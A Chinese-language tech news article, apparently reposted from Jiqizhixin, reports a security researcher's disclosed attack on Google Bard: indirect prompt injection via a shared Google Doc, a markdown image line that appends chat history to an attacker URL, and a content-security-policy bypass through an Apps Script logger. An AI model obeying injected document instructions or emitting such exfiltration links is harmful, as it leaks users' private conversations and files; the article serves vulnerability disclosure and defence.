展會(huì)信息港展會(huì)大全

谷歌Bard「破防」,用自然語言破解,提示注入引起數(shù)據(jù)泄漏風(fēng)險(xiǎn)
來源:互聯(lián)網(wǎng)   發(fā)布日期:2023-11-20 14:45:19   瀏覽:5279次  

導(dǎo)讀:機(jī)器之心報(bào)道 編輯:佳琪 操控 Bard 的秘密:運(yùn)用一種叫提示注入(Prompt Injection)的技術(shù),黑客可以只使用自然語言破解人工智能系統(tǒng)。 大型語言模型在生成文本時(shí)非常依賴提示詞。這種攻擊技術(shù)對(duì)于通過提示詞學(xué)習(xí)模型而言可謂是「以彼之矛,攻己之盾」,是...

機(jī)器之心報(bào)道

編輯:佳琪

操控 Bard 的秘密:運(yùn)用一種叫提示注入(Prompt Injection)的技術(shù),黑客可以只使用自然語言破解人工智能系統(tǒng)。

大型語言模型在生成文本時(shí)非常依賴提示詞。這種攻擊技術(shù)對(duì)于通過提示詞學(xué)習(xí)模型而言可謂是「以彼之矛,攻己之盾」,是最強(qiáng)長項(xiàng),同時(shí)也是難以防范的軟肋。

提示詞分為系統(tǒng)指令和用戶給出的指令,在自然語言中,這兩者難以區(qū)分。如果用戶有意在輸入提示詞時(shí),模仿系統(tǒng)指令,那么模型可能在對(duì)話里透露一些只有它才知道的「秘密」。

提示注入攻擊有多種形式,主要為直接提示注入和間接提示注入。直接提示注入指用戶直接向模型輸入惡意指令,試圖引發(fā)意外或有害的行為。間接提示注入指攻擊者將惡意指令注入到可能被模型檢索或攝入的文檔中,從而間接地控制或引導(dǎo)模型。

有網(wǎng)友使用「系統(tǒng)指令」引導(dǎo) GPT 泄露數(shù)據(jù)

最近,谷歌 Bard 迎來了一波強(qiáng)大的更新,Bard 增加了拓展功能,支持訪問 YouTube,搜索航班和酒店,還能查閱用戶的個(gè)人文件和郵件。

除此之外,Bard 可以連接到「谷歌全家桶」,訪問你的谷歌云盤、文檔和郵件!但這同時(shí)意味著 Bard 將分析不受信任的數(shù)據(jù),容易受間接提示注入的影響。也就是說,不懷好意的人可能通過向你發(fā)送電子郵件或強(qiáng)行分享谷歌文檔進(jìn)行間接的提示注入攻擊,因?yàn)閷?duì)方發(fā)什么樣的郵件、文檔給你,你是控制不了的,但 Bard 卻會(huì)無差別訪問。

在安全風(fēng)險(xiǎn)分析領(lǐng)域有著 20 年經(jīng)驗(yàn)的前微軟 Azure 安全工程師 Johann Rehberger 體驗(yàn)了 Bard 的全新版本,并測試了被提示注入攻擊時(shí),Bard 的數(shù)據(jù)泄漏風(fēng)險(xiǎn)。

原博客鏈接:https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/?continueFlag=53578cc8c5c0a6a19c571a1fa6bcab85

Johann 首先快速驗(yàn)證了提示注入的可行性。他通過讓 Bard 分析舊的 YouTube 視頻,并使用谷歌文檔進(jìn)行測試測試結(jié)果顯示,Bard 確實(shí)按照他的額外提示進(jìn)行了操作,這證明了接下來要進(jìn)行的測試的可行性。

Bard 的漏洞:圖像 Markdown 注入

在得知 Bard 可以被提示注入后,Johann 開始了進(jìn)一步的研究。

LLM 應(yīng)用中的一個(gè)常見漏洞是通過渲染超鏈接和圖像來泄露聊天歷史記錄。問題是,這如何適用于谷歌 Bard?

當(dāng)谷歌的大模型返回文本時(shí),它可以返回 markdown 元素,Bard 將其呈現(xiàn)為 HTML! 這包括渲染圖像的功能。

想象一下谷歌的大模型返回這樣的文本:

![Data Exfiltration in Progress](https://wuzzi.net/logo.png?goog=[DATA_EXFILTRATION])

這將呈現(xiàn)為 HTML 圖像標(biāo)記,其 src 屬性指向 attacker 服務(wù)器。

瀏覽器會(huì)自動(dòng)連接到 URL,無需用戶交互即可加載圖片。借助 LLM 的強(qiáng)大功能,我們可以在聊天上下文中總結(jié)或訪問以前的數(shù)據(jù),并將其相應(yīng)地附加到 URL 中。

在編寫漏洞利用程序時(shí),Johann 很快就開發(fā)出了一個(gè)提示注入有效載荷,它可以讀取對(duì)話的歷史記錄,并形成一個(gè)包含該歷史記錄的超鏈接。然而,谷歌的內(nèi)容安全策略(CSP)阻止了圖像的渲染。這對(duì)攻擊者來說是一個(gè)難題。

繞過內(nèi)容安全策略

要從攻擊者控制的服務(wù)器渲染圖片,并不容易。谷歌的內(nèi)容安全策略阻止從任意源加載圖片。CSP 包含諸如 *.google.com 和 *.googleusercontent.com 之類的源,相當(dāng)廣泛。這意味著應(yīng)該能找到一種繞過方法。

研究后,Johann 得知了 Google Apps Script,這或許可以繞過 CSP 。

如此一來,Bard Logger 可以在 Apps Script 中完成了。這個(gè) Logger 將所有附加到調(diào)用 URL 的查詢參數(shù)寫入一個(gè) Google Doc,而它正是外泄的目的地。

起初,Johann 以為這個(gè)方法并不可行,但他發(fā)現(xiàn)點(diǎn)擊了幾下 Apps Script 用戶界面后,他找到了一個(gè)無需驗(yàn)證的設(shè)置。

接下來,一切準(zhǔn)備工作就緒:

確認(rèn)了谷歌 Bard 易受通過擴(kuò)展程序數(shù)據(jù)間接注入提示的影響

谷歌 Bard 有允許零點(diǎn)擊渲染圖片的漏洞

一個(gè)寫有提示注入指令的惡意谷歌文檔

一個(gè)位于 google.com 上的日志端點(diǎn),用于在圖像加載時(shí)接收數(shù)據(jù)。

泄露過程

Johann 提供了他讓 Bard 泄露數(shù)據(jù)的全過程。

原視頻鏈接:https://www.youtube.com/watch?v=CKAED_jRaxw&t=4s

首先,和 Bard 先聊一些日常:

用戶訪問一個(gè)谷歌文檔(The Bard2000),這導(dǎo)致攻擊者指令注入和圖像渲染。

攻擊者通過 Apps Script 中的腳本將數(shù)據(jù)接收到谷歌文檔。

以下是 Johann 用于「提示注入」的谷歌文檔:

谷歌的修復(fù)

這個(gè)安全問題已經(jīng)于 2023 年 9 月 19 日報(bào)告給 Google VRP。

10 月 19 日,Johann 想要在 Ekoparty 2023 中進(jìn)行演示,所以詢問了關(guān)于這個(gè)漏洞的情況。Google 確認(rèn)已經(jīng)修復(fù)。目前還不太清楚谷歌采取了何種修復(fù)措施。但 CSP 沒有修改,仍然可以渲染圖像。因此,這可能是已經(jīng)采取了一些過濾措施,以防止將數(shù)據(jù)插入到 URL 中。

參考鏈接:

https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/?continueFlag=53578cc8c5c0a6a19c571a1fa6bcab85

https://www.youtube.com/watch?v=CKAED_jRaxw&t=4s

贊助本站

人工智能實(shí)驗(yàn)室
相關(guān)內(nèi)容
AiLab云推薦
推薦內(nèi)容
展開

熱門欄目HotCates

Copyright © 2010-2024 AiLab Team. 人工智能實(shí)驗(yàn)室 版權(quán)所有    關(guān)于我們 | 聯(lián)系我們 | 廣告服務(wù) | 公司動(dòng)態(tài) | 免責(zé)聲明 | 隱私條款 | 工作機(jī)會(huì) | 展會(huì)港